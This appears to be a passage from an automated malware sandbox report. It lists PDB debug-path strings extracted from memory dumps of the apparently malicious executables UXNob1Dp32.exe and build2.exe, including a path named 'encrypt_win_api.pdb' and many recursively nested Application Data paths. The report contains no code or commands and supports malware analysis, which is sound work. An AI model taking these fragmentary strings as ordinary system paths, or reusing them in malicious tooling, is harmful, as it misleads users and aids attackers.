Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@qKDX source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$FSS source: UXNob1Dp32.exe, 00000005.00000003.2175321525.0000000003765000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\C:\U source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153154383.0000000003481000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.0000000003394000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\75\s source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\% source: UXNob1Dp32.exe, 00000005.00000003.2171274137.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\c source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\rj source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\WebVi source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: UXNob1Dp32.exe, 00000005.00000003.2170035395.0000000003457000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151477986.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171481315.000000000348D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2169860654.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098524116.0000000003364000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ D source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqqrW source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\\ source: UXNob1Dp32.exe, 00000005.00000003.2097904032.0000000003328000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003315000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098947888.0000000003399000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098229104.0000000003390000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: UXNob1Dp32.exe, 00000005.00000003.2176662041.0000000003371000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170142307.0000000003383000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176808323.0000000003388000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\*F source: UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ty source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142833395.00000000036F5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Application Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2192611386.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\v4.0\m(4ZV source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ta\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.0000000003844000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.0000000003835000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BACKGR~2ntkrnlmp.pdbndTransferApiGroup source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\oft.A source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\1fd79}\n source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.000000000348C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098470460.0000000003489000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\{ source: UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121148461.000000000339F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OptimizationGuidePredictionModels\\bbwe\ation Data\Application Data\Microsoft\input\en-JM\ata\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000002.2204030109.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2153418605.000000000340F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152535019.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: '{aC:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\2B_cw5 source: UXNob1Dp32.exe, 00000005.00000003.2099016329.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2076215601.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836615176.0000000003153000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099758029.000000000315B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075944763.000000000314F000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099141550.000000000315A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\icat source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqy) source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195447541.000000000315E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: UXNob1Dp32.exe, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ta\j source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l2+P source: UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
